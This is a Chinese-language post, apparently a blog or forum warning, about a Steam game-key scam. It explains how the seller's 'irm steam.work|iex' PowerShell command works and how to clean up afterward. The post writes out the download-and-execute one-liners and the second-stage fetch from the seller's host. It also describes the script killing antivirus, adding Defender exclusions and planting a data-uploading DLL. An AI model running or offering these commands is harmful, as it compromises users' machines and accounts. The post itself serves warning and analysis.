步骤1:按住键盘win+X ,找到powershell(终端管理员)(A)
步骤2:输入irm steam.work|iex (请复制,不要手打,输入后按回车键,会出现steam图标,等待自动关闭)
步骤3:自动启动steam,并在steam里左下角游戏卡密输入卡密,激活完成
这些步骤,图片,和远远低于市场价格的CDK熟悉吗?如果熟悉,那么恭喜你(bushi,中招啦
这种要求进行激活游戏的,很大概率会导致你的steam红信或者直接封号
指令中间换成什么steam-run什么的,都是一路货色,没什么差别
买了,没激活
那么如果你已经购买了,但是还没激活的,请立即找到店家进行退款,可以直接走第三方客服进行维权,运行不知名的指令,这是很危险的行为
买了,激活了
如果你已经激活了,那么请先给steam关掉,避免被远在大陆另一侧的G胖发红色情书(如果关不掉可以使用Ctrl + Shift + ESC直接结束进程)
然后卸载steam并且重新安装,并且找到你C:\Users\用户名\AppData\Local\SteamActive和C:\Users\用户名\AppData\Local\Steam手动删除,不然等于白卸
然后查看你的Windows Defender白名单(打开你的powershell,这次也是管理员,执行 Get-MpPreference | Select-Object -ExpandProperty ExclusionPath,如果找到了和steam相关的东西,那么Remove-MpPreference -ExclusionPath 你刚才的文件位置)删除掉被强行加入杀毒软件白名单的假动态链接库文件
没买,看完原理心有不忿
举报,干死他!
破解有错,不告诉用户相关的风险,甚至不告诉用户这是破解,罪该万死!
实现原理
首先,我们要知道这个指令是干什么的。
irm steam.work | iex
irm -> Invoke-RestMethod的缩写,从URL中下载内容
iex nvoke-Expression的缩写,运行脚本的意思
合起来就是从这个steam.work下载脚本并且立即执行
那么有问题多的朋友就会问了,这个steam.work我访问就是官方的商店啊,欸,这个是不对的,因为这里是直接下载脚本执行,所以我们应该下载下来看看,也就是
(irm steam.work) | Out-File -FilePath "D:\aha\steam_work.ps1"
这个文件下载下来如果当作powershell用编译器打开,一看就能看出来,只有一行代码
irm steam.work/pwsDwFile/new -OutFile x.ps1
又是一个下载脚本的代码,那么我们知道,事出反常必有妖,照样,下载下来看看
这个脚本里,就是真正的坏事做尽了,因为考虑到有些小伙伴不是很熟悉powershell,我给差不多每一行都来了中文的注释(绿色的就是)(给我整个赞,快点的
那么他干了什么呢?
- 如果当前正在运行流氓头子360,那么给他强制关闭(头子就是有牌面)
- 给Steam路径添加到Windows Defender的白名单里,方便接下来的操作,并且不论如何都输出绿色的成功(只能说是诡计多端)
- 替换你steam安装目录下的hid.dll文件(这是一个破解的动态连接库文件,用来在你输入卖家给的CDK之后显示成功并且骗过G胖让你下载游戏)
- 替换你C盘当前用户下的SteamActive中的hid.dll文件(和上一个差不多,但是这个里面有对当前用户的系统信息上传)
我只能说,坏事做尽
好在他并没有对于系统进行安装病毒等等操作,不然专题就得加上一个《爆破无良商家和他脆弱的服务器》的章节了
最后
贪小便宜吃大亏,远远低于官方价格的这些奇怪操作还是尽量少尝试。如果真的是学生党手中结余,可以三五好友一起买一个,用Steam推出的共享家庭组(在线找义父,又称赛博仙人跳)
这个steam.work是在扬州的一个ip,不知道走没走ip跳转代理(如果赞够多,可以直接加入章节 《爆破无良商家和他脆弱的服务器,顺便找到他亲爱的老家去》)
然后,dll文件已经弄下来了,因为比较多,并且涉及到了一些不太好的手法,感兴趣的同学可以自己去反编译一下看看里面藏了什么鬼东西(或者点赞够多了可以直接展开说说)
irm -Uri "http://steam.work/pwsDwFile/9b96dac2bb0ba18d56068fabc5b17185.pdf" -OutFile 你的目标文件名字